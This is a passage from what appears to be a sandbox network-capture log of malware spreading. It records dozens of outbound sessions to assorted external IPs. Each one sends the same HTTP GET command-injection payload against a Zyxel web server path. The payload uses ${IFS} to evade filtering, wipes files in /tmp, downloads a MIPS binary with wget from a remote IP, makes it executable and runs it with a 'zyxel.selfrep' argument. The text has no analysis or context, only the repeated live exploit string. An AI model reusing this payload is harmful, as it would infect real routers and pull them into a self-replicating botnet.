                                      Jan 14, 2024 15:50:38.098237991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2206192.168.2.1457454194.3.89.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098249912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2207192.168.2.1449240176.131.178.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098289967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2208192.168.2.1447978142.143.111.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098336935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2209192.168.2.1446608205.109.220.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098357916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2210192.168.2.145362032.156.253.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098407030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2211192.168.2.1449224119.236.87.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098442078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2212192.168.2.143660814.49.253.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098486900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2213192.168.2.145136625.79.207.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098526955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2214192.168.2.1452752151.239.212.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098568916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2215192.168.2.1439118129.54.216.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098599911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2216192.168.2.1442772172.70.68.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098647118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2217192.168.2.1458550210.111.167.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098692894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2218192.168.2.1441342164.115.248.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098726034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2219192.168.2.1436250209.135.248.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098767042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2220192.168.2.143767673.223.98.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098819971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2221192.168.2.145682453.183.216.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098853111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2222192.168.2.1450118209.37.105.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098877907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2223192.168.2.144719893.71.9.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098923922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2224192.168.2.1440390202.69.93.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.098948956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2225192.168.2.1445416160.193.106.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099009991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2226192.168.2.1449662101.127.119.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099040031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2227192.168.2.143880273.13.38.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099087000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2228192.168.2.1445826116.58.159.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099136114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2229192.168.2.145204054.185.93.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099181890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2230192.168.2.144432467.138.157.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099217892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2231192.168.2.1440670181.225.19.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099251032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2232192.168.2.1444964216.41.71.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099309921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2233192.168.2.1441664170.94.89.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099371910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2234192.168.2.143838835.19.230.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099395037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2235192.168.2.1458486118.53.115.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099446058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2236192.168.2.144783413.58.99.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099483967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2237192.168.2.1453210110.191.33.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099529982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2238192.168.2.1453788174.102.196.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099581003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2239192.168.2.1439408212.4.109.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099621058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2240192.168.2.145778290.86.97.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099654913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2241192.168.2.1457230212.225.249.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099700928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2242192.168.2.144384077.234.36.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099737883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2243192.168.2.143945657.182.76.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099781990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2244192.168.2.1443964203.195.227.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099829912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2245192.168.2.1445470222.233.4.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099862099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2246192.168.2.1435850182.249.111.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099903107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2247192.168.2.1443336158.15.80.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099929094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2248192.168.2.1438192169.246.26.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.099978924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2249192.168.2.1443442170.2.224.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100009918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2250192.168.2.145755072.173.254.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100048065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2251192.168.2.1460170196.178.17.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100099087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2252192.168.2.143736635.227.58.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100143909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2253192.168.2.145682677.13.25.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100193977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2254192.168.2.1451288207.235.185.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100250006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2255192.168.2.144837417.12.179.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100305080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2256192.168.2.1454416157.105.158.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100332975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2257192.168.2.1444858161.179.80.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100364923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2258192.168.2.143800220.70.29.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100399971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2259192.168.2.144519213.13.51.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100435019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2260192.168.2.144539439.89.113.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100478888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2261192.168.2.145570442.173.178.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100511074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2262192.168.2.1433790188.194.108.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100547075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2263192.168.2.144024854.183.175.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100591898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2264192.168.2.1442882117.126.69.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100629091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2265192.168.2.1455044125.24.189.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100661993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2266192.168.2.1455978164.244.27.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100697041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2267192.168.2.14418304.107.70.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100749016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2268192.168.2.144523681.230.5.170443
                                      TimestampBytes transferredDirectionData
